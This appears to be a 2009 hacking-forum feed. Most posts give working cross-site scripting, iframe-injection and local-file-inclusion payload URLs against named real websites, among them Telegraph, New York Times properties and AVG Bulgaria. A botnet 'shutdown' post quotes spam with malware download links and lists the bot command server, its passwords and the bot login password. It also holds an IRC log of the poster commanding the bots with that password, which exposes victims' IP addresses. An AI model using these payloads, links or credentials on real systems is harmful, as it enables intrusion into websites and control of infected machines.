    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 31 May 2009 12:04:23 GMT 1652813958
    <![CDATA[DChublist.ro - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ http://img26.imageshack.us/img26/1334/54731670.gif

    iframe injection
    http://img26.imageshack.us/img26/1465/14435300.gif

    vulnerable also to sql injection
    http://img26.imageshack.us/img26/7122/61967996.gif

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 31 May 2009 18:47:54 GMT 767825983
    <![CDATA[Telegraph.co.uk - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://tvlistings.telegraph.co.uk/grid.php?&day="><script>alert(String.fromCharCode(88,83,83))</script>

    Code:
    http://tvlistings.telegraph.co.uk/grid.php?&day=2009-05-31&oclock=4.00pm&tab="><script>alert(String.fromCharCode(88,83,83))</script>

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 3 Jun 2009 18:38:13 GMT 1751679554
    <![CDATA[Protvmagazin.ro - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.protvmagazin.ro/index.php?module=website§ion=default&page=tv_program&chooseDay="><script>alert(String.fromCharCode(88,83,83))</script>



    lfi

    Code:
    http://www.protvmagazin.ro/index.php?module=../../../../../../etc/passwd%00



    Quote:
    Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(/www/protvmagazin.ro/src/system/modules/../../../../../../etc/passwd) is not within the allowed path(s): (/www/protvmagazin.ro/:/usr/share/phpmyadmin/:/etc/phpmyadmin/:/usr/share/pear:/usr/share/php) in /www/protvmagazin.ro/src/system/includes/init.php on line 37
    Module not found.

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 3 Jun 2009 18:41:40 GMT 1517382802
    <![CDATA[AVG BULGARIA - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.avgbulgaria.com/virus-encyclopaedia?query="'/><script>alert(String.fromCharCode(88,83,83))</script>

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 3 Jun 2009 18:44:00 GMT 4007955335
    <![CDATA[The New York Times - multiple XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://nytimes.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp?narrowdesc=Accounting&narrowcode=FA01&metrocode=&zipcode="><script>alert(String.fromCharCode(88,83,83))</script>


    Code:
    http://nytimes.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp?narrowdesc="'/><script>alert(String.fromCharCode(88,83,83))</script>


    Code:
    http://www.nytstore.com/EmailConfirm.aspx?Email="'/><script>alert(String.fromCharCode(88,83,83))</script>


    Code:
    http://query.nytimes.com/search/query?srchst=r&term="'/><script>alert(String.fromCharCode(88,83,83))</script>

    Iframe
    Code:
    http://vizlab.nytimes.com/datasets?q=%22%3E%3Ciframe%20src=index.htm






    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 3 Jun 2009 18:50:07 GMT 3762870697
    <![CDATA[AllHubs Hublist - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.allhubs.org/e107_plugins/hublist_plugin/phps/nicksearch.php?unev="><script>alert(String.fromCharCode(88,83,83))</script>

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 3 Jun 2009 19:42:44 GMT 2018033344
    <![CDATA[TwitterCounter.com - XSS - Iframe Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://twittercounter.com/milw0rm?predicted="><script>alert(String.fromCharCode(88,83,83))</script>

    http://img195.imageshack.us/img195/1821/31284407.jpg

    Code:
    http://twittercounter.com/milw0rm?predicted="<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='1000%' height='400px' src='http://nemesis.te-home.net'>

    http://img195.imageshack.us/img195/7577/15868369.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Fri, 5 Jun 2009 18:44:07 GMT 417773029
    <![CDATA[Shutdown of "Hack-elite" botnets part 1]]> http://nemesis.te-home.net/Forum/3000_News/20090605_Shutdown_of__Hack_elite__botnets.html
    [H-€]-Dark wrote:
    [16:26:47] <[H-€]-Dark>
    Fa update la clientul tau cu ultima versiune ! Download mai rapid ! http://paradise.oficialdc.ro/StrongDC++3.17.exe
    Vizioneaza toate posturile TV direct dupa calculatorul tau instaland programul acesta http://paradise.oficialdc.ro/TV_Online.exe
    Vezi parola la mess oricui doar instaland programul asta http://paradise.oficialdc.ro/YMsgrHack.exe
    Modifica profilul sau chiar parola utilizand programul acesta http://paradise.oficialdc.ro/Hi5Hack.exe
    [20:19:55] <[H-€]-Dark> Joc PORNO Super Tare cu ELeva Porno si cu Piticu Porno ! Descarcare Link ! => http://ploiesti.no-ip.org/Porno_Game.exe


    RxBot settings:
    • Server address: rocking-dns.no-ip.org:9000 (195.93.140.133)
    • Server password: asd123
    • Channel: #hasmocaru
    • Channel password: samisugipula
    • Bots have this prefix: [B]-*
    • Login password for bots: hasmepeleu


    rocking-dns.no-ip.org:9000/#hasmocaru wrote:
    [2009-06-05 14:38] *** Connected
    [2009-06-05 14:38] *** Joins: Lithium
    [2009-06-05 14:38] *** Joins: [B]-826310
    [2009-06-05 14:38] *** Looking up your hostname
    [2009-06-05 14:38] *** Found your hostname, cached
    [2009-06-05 14:38] *** Checking Ident
    [2009-06-05 14:38] *** No ident response
    [2009-06-05 14:38] <my.server.name> MODE :Register first.
    [2009-06-05 14:38] <my.server.name> Welcome to the Internet Relay Network [B]-82631
    Your host is my.server.name, running version beware1.5.7
    This server was created Tue Jul 13 2004 at 20:36:17 GMT
    my.server.name beware1.5.7 dgikoswx biklmnoprstv
    MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server
    [2009-06-05 14:38] <my.server.name> NICKLEN=9 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server
    There are 132 users and 0 invisible on 1 servers
    2 :channels formed
    I have 132 clients and 0 servers
    [2009-06-05 14:38] *** [B]-82631 Highest connection count: 140 (140 clients)
    [2009-06-05 14:38] <my.server.name> MOTD File is missing
    [2009-06-05 14:38] *** [B]-82631 on 1 ca 2(4) ft 10(10)
    [2009-06-05 14:38] *** Joins: [B]-82631
    [2009-06-05 14:38] *** Joins: [B]-62370
    [2009-06-05 14:38] *** Joins: [B]-70953
    [2009-06-05 14:38] *** Joins: [B]-08703
    [2009-06-05 14:38] *** Joins: [B]-87604
    [2009-06-05 14:38] *** Joins: [B]-24866
    [2009-06-05 14:38] *** Joins: [B]-14682
    [2009-06-05 14:38] *** Joins: [B]-14730
    [2009-06-05 14:38] *** Joins: [B]-20879
    [2009-06-05 14:38] *** Joins: [B]-81591
    [2009-06-05 14:38] *** Joins: [B]-67509
    [2009-06-05 14:38] *** Joins: [B]-46389
    [2009-06-05 14:38] *** Joins: [B]-01354
    [2009-06-05 14:38] *** Joins: [B]-91730
    [2009-06-05 14:38] *** Joins: [B]-32938
    [2009-06-05 14:38] *** Joins: [B]-90335
    [2009-06-05 14:38] *** Joins: [B]-39000
    [2009-06-05 14:38] *** Joins: [B]-06159
    [2009-06-05 14:38] *** Joins: [B]-62234
    [2009-06-05 14:38] *** Joins: [B]-65191
    [2009-06-05 14:38] *** Joins: [B]-64521
    [2009-06-05 14:38] *** Joins: [B]-14648
    [2009-06-05 14:38] *** Joins: [B]-60543
    [2009-06-05 14:38] *** Joins: [B]-09597
    [2009-06-05 14:38] *** Joins: [B]-42513
    [2009-06-05 14:38] *** Joins: [B]-62500
    [2009-06-05 14:38] *** Joins: [B]-22581
    [2009-06-05 14:38] *** Joins: [B]-67088
    [2009-06-05 14:38] *** Joins: [B]-90543
    [2009-06-05 14:38] *** Joins: [B]-87077
    [2009-06-05 14:38] *** Joins: [B]-09880
    [2009-06-05 14:38] *** Joins: [B]-97011
    [2009-06-05 14:38] *** Joins: [B]-93726
    [2009-06-05 14:38] *** Joins: [B]-37431
    [2009-06-05 14:38] *** Joins: [B]-27366
    [2009-06-05 14:38] *** Joins: [B]-95220
    [2009-06-05 14:38] *** Joins: [B]-13286
    [2009-06-05 14:38] *** Joins: [B]-44516
    [2009-06-05 14:38] *** Joins: [B]-55553
    [2009-06-05 14:38] *** Joins: [B]-07922
    [2009-06-05 14:38] *** Joins: [B]-17582
    [2009-06-05 14:38] *** Joins: [B]-78466
    [2009-06-05 14:38] *** Joins: [B]-22054
    [2009-06-05 14:38] *** Joins: [B]-67902
    [2009-06-05 14:38] *** Joins: [B]-85365
    [2009-06-05 14:38] *** Joins: [B]-38776
    [2009-06-05 14:38] *** Joins: [B]-41853
    [2009-06-05 14:38] *** Joins: [B]-85449
    [2009-06-05 14:38] *** Joins: [B]-07757
    [2009-06-05 14:38] *** Joins: [B]-37881
    [2009-06-05 14:38] *** Joins: [B]-12675
    [2009-06-05 14:38] *** Joins: [B]-12414
    [2009-06-05 14:38] *** Joins: [B]-47600
    [2009-06-05 14:38] *** Joins: [B]-41448
    [2009-06-05 14:38] *** Joins: [B]-48704
    [2009-06-05 14:38] *** Joins: [B]-25564
    [2009-06-05 14:38] *** Joins: [B]-61481
    [2009-06-05 14:38] *** Joins: [B]-34358
    [2009-06-05 14:38] *** Joins: [B]-21452
    [2009-06-05 14:38] *** Joins: [B]-11066
    [2009-06-05 14:38] *** Joins: [B]-16425
    [2009-06-05 14:38] *** Joins: [B]-64848
    [2009-06-05 14:38] *** Joins: [B]-94559
    [2009-06-05 14:38] *** Joins: [B]-81640
    [2009-06-05 14:38] *** Joins: [B]-65479
    [2009-06-05 14:38] *** Joins: [B]-56145
    [2009-06-05 14:38] *** Joins: [B]-12761
    [2009-06-05 14:38] *** Joins: [B]-99735
    [2009-06-05 14:38] *** Joins: [B]-44963
    [2009-06-05 14:38] *** Joins: [B]-19684
    [2009-06-05 14:38] *** Joins: [B]-55840
    [2009-06-05 14:38] *** Joins: [B]-60819
    [2009-06-05 14:38] *** Joins: [B]-64505
    [2009-06-05 14:38] *** Joins: [B]-84417
    [2009-06-05 14:38] *** Joins: [B]-21387
    [2009-06-05 14:38] *** Joins: [B]-86328
    [2009-06-05 14:38] *** Joins: [B]-82006
    [2009-06-05 14:38] *** Joins: [B]-15045
    [2009-06-05 14:38] *** Joins: [B]-73126
    [2009-06-05 14:38] *** Joins: [B]-06860
    [2009-06-05 14:38] *** Joins: [B]-86857
    [2009-06-05 14:38] *** Joins: [B]-82474
    [2009-06-05 14:38] *** Joins: [B]-98440
    [2009-06-05 14:38] *** Joins: [B]-45657
    [2009-06-05 14:38] *** Joins: [B]-92539
    [2009-06-05 14:38] *** Joins: [B]-29203
    [2009-06-05 14:38] *** Joins: [B]-13919
    [2009-06-05 14:38] *** Joins: [B]-41736
    [2009-06-05 14:38] *** Joins: [B]-10588
    [2009-06-05 14:38] *** Joins: [B]-92482
    [2009-06-05 14:38] *** Joins: [B]-58659
    [2009-06-05 14:38] *** Joins: [B]-27723
    [2009-06-05 14:38] *** Joins: [B]-93786
    [2009-06-05 14:38] *** Joins: [B]-21175
    [2009-06-05 14:38] *** Joins: [B]-86449
    [2009-06-05 14:38] *** Joins: [B]-02772
    [2009-06-05 14:38] *** Joins: [B]-77981
    [2009-06-05 14:38] *** Joins: [B]-36739
    [2009-06-05 14:38] *** Joins: [B]-26212
    [2009-06-05 14:38] *** Joins: [B]-03339
    [2009-06-05 14:38] *** Joins: [B]-74411
    [2009-06-05 14:38] *** Joins: [B]-36236
    [2009-06-05 14:38] *** Joins: [B]-26661
    [2009-06-05 14:38] *** Joins: [B]-12421
    [2009-06-05 14:38] *** Joins: [B]-87295
    [2009-06-05 14:38] *** Joins: [B]-77890
    [2009-06-05 14:38] *** Joins: [B]-42374
    [2009-06-05 14:38] *** Joins: [B]-92180
    [2009-06-05 14:38] *** Joins: [B]-14520
    [2009-06-05 14:38] *** Joins: [B]-26614
    [2009-06-05 14:38] *** Joins: [B]-66550
    [2009-06-05 14:38] *** Joins: [B]-43665
    [2009-06-05 14:38] *** Joins: [M][B]-11
    [2009-06-05 14:38] *** Joins: [B]-51519
    [2009-06-05 14:38] *** Joins: [B]-98491
    [2009-06-05 14:38] *** Joins: [B]-66818
    [2009-06-05 14:38] *** Joins: [M][B]-64
    [2009-06-05 14:38] *** Joins: [B]-85847
    [2009-06-05 14:38] *** Joins: [B]-57087
    [2009-06-05 14:38] *** Joins: [B]-68722
    [2009-06-05 14:38] *** Joins: [B]-86515
    [2009-06-05 14:38] *** Joins: [B]-12976
    [2009-06-05 14:38] *** Joins: [B]-57638
    [2009-06-05 14:38] *** Joins: [B]-86386
    [2009-06-05 14:38] *** Joins: [B]-26329
    [2009-06-05 14:38] *** Joins: [B]-71693
    [2009-06-05 14:38] *** Joins: [B]-58095
    [2009-06-05 14:38] *** Joins: [B]-45718
    [2009-06-05 14:38] *** Joins: [B]-57618
    [2009-06-05 14:38] *** Joins: [B]-40306
    [2009-06-05 14:38] <my.server.name>
    ~ufzayig 79.114.55.108 * :[M][B]-116881
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    7344 1244194119 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 14:38] <my.server.name>
    ~hspsav 79.113.244.232 * :[M][B]-645276
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    7353 1244194112 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 14:38] *** Parts: [B]-91730
    [2009-06-05 14:39] <my.server.name>
    ~jxskxrlv 92.84.73.72 * :[B]-013548
    #hasmocaru
    my.server.name :I'm too lazy to edit ircd.conf
    1052 1244200424 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 14:39] *** Joins: [B]-04197
    [2009-06-05 14:41] <[B]-85847> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-85847> [MAIN]: Removing Bot.
    [2009-06-05 14:41] *** Parts: [B]-85847
    [2009-06-05 14:41] *** Joins: [B]-64905
    [2009-06-05 14:41] *** Parts: [B]-04197
    [2009-06-05 14:41] *** Parts: [B]-62370
    [2009-06-05 14:41] <Lithium> .login hasmepeleu
    [2009-06-05 14:41] <Lithium> .remove
    [2009-06-05 14:41] *** Parts: [M][B]-11
    [2009-06-05 14:41] <[B]-26329> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-57638> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-58095> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-71693> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-43665> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-66550> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-26614> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-66818> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-51519> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[M][B]-64> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-42374> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-40306> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-92180> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-98491> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-36236> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-93786> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-12421> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-02772> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-86449> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-26212> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-21175> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-26661> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-82474> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-21387> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-92539> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-10588> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-60819> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-86515> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-29203> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-82006> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-41736> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-06860> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-58659> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-27723> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-94559> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-55840> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-77890> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-16425> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-86857> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-99735> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-65479> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-47600> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-25564> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-12414> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-37881> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-12675> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-48704> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-44963> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-64505> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-57618> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-38776> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-07922> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-73126> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-67088> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-36739> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-95220> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-84417> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-46389> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-17582> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-64521> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-32938> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-09597> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-56145> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-67509> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-86380> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-60543> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-07757> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-55553> [MAIN]: Password accepted.
    [2009-06-05 14:41] <[B]-14682> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-22581> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-20879> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-87077> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-90543> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-87604> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-13286> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-41853> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-64905> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-09880> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-86328> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-37431> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-27366> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-78466> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-93726> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-21452> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-70953> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-62234> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-85449> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-42513> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-44516> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-61481> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-81591> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-65191> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-97011> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-19684> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-08703> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-68722> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-45657> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-87295> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-12761> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-77981> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-14520> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-62500> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-64848> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-81640> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-03339> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-85365> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-90335> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-41448> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-15045> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-34358> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-74411> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-98440> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-45718> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-13919> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-92482> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-86386> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-01354> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-14730> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-21452> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-20879> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-38776> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-06159> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-22581> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-87077> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-13286> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-68722> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-70953> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-74411> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-64848> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-12675> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-37431> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-12976> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-57638> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-12421> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-36739> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-81640> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-78466> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-66550> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-55553> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-92180> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-12761> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-60543> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-26212> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-67902> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-41448> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-26329> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-62500> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-17582> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-09597> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[M][B]-64> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-86380> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-14648> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-24866> [MAIN]: Password accepted.
    [2009-06-05 14:42] <[B]-73126> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-21175> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-03339> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-08703> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-98491> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-02772> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-29203> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-45657> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-92482> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-27723> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-27366> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-55840> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-92539> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-51519> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-32938> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-58095> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-85449> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-64905> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-66818> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-67088> [MAIN]: Removing Bot.
    [2009-06-05 14:42] *** Parts: [B]-21452
    [2009-06-05 14:42] *** Parts: [B]-20879
    [2009-06-05 14:42] *** Parts: [B]-38776
    [2009-06-05 14:42] *** Parts: [B]-22581
    [2009-06-05 14:42] *** Parts: [B]-87077
    [2009-06-05 14:42] *** Parts: [B]-13286
    [2009-06-05 14:42] *** Parts: [B]-68722
    [2009-06-05 14:42] *** Parts: [B]-70953
    [2009-06-05 14:42] *** Parts: [B]-74411
    [2009-06-05 14:42] *** Parts: [B]-64848
    [2009-06-05 14:42] *** Parts: [B]-12675
    [2009-06-05 14:42] *** Parts: [B]-37431
    [2009-06-05 14:42] *** Parts: [B]-57638
    [2009-06-05 14:42] *** Parts: [B]-12421
    [2009-06-05 14:42] *** Parts: [B]-36739
    [2009-06-05 14:42] *** Parts: [B]-81640
    [2009-06-05 14:42] *** Parts: [B]-78466
    [2009-06-05 14:42] *** Parts: [B]-66550
    [2009-06-05 14:42] *** Parts: [B]-55553
    [2009-06-05 14:42] *** Parts: [B]-92180
    [2009-06-05 14:42] *** Parts: [B]-12761
    [2009-06-05 14:42] *** Parts: [B]-60543
    [2009-06-05 14:42] *** Parts: [B]-26212
    [2009-06-05 14:42] *** Parts: [B]-41448
    [2009-06-05 14:42] *** Parts: [B]-26329
    [2009-06-05 14:42] *** Parts: [B]-62500
    [2009-06-05 14:42] *** Parts: [B]-17582
    [2009-06-05 14:42] *** Parts: [B]-09597
    [2009-06-05 14:42] *** Parts: [M][B]-64
    [2009-06-05 14:42] *** Parts: [B]-86380
    [2009-06-05 14:42] *** Parts: [B]-73126
    [2009-06-05 14:42] *** Parts: [B]-21175
    [2009-06-05 14:42] *** Parts: [B]-03339
    [2009-06-05 14:42] *** Parts: [B]-08703
    [2009-06-05 14:42] *** Parts: [B]-98491
    [2009-06-05 14:42] *** Parts: [B]-02772
    [2009-06-05 14:42] *** Parts: [B]-29203
    [2009-06-05 14:42] *** Parts: [B]-92482
    [2009-06-05 14:42] *** Parts: [B]-45657
    [2009-06-05 14:42] *** Parts: [B]-27723
    [2009-06-05 14:42] *** Parts: [B]-27366
    [2009-06-05 14:42] *** Parts: [B]-55840
    [2009-06-05 14:42] *** Parts: [B]-92539
    [2009-06-05 14:42] *** Parts: [B]-51519
    [2009-06-05 14:42] *** Parts: [B]-32938
    [2009-06-05 14:42] *** Parts: [B]-58095
    [2009-06-05 14:42] *** Parts: [B]-85449
    [2009-06-05 14:42] *** Parts: [B]-64905
    [2009-06-05 14:42] *** Parts: [B]-66818
    [2009-06-05 14:42] *** Parts: [B]-67088
    [2009-06-05 14:42] <[B]-07922> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-12976> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-13919> [MAIN]: Removing Bot.
    [2009-06-05 14:42] <[B]-16425> [MAIN]: Removing Bot.
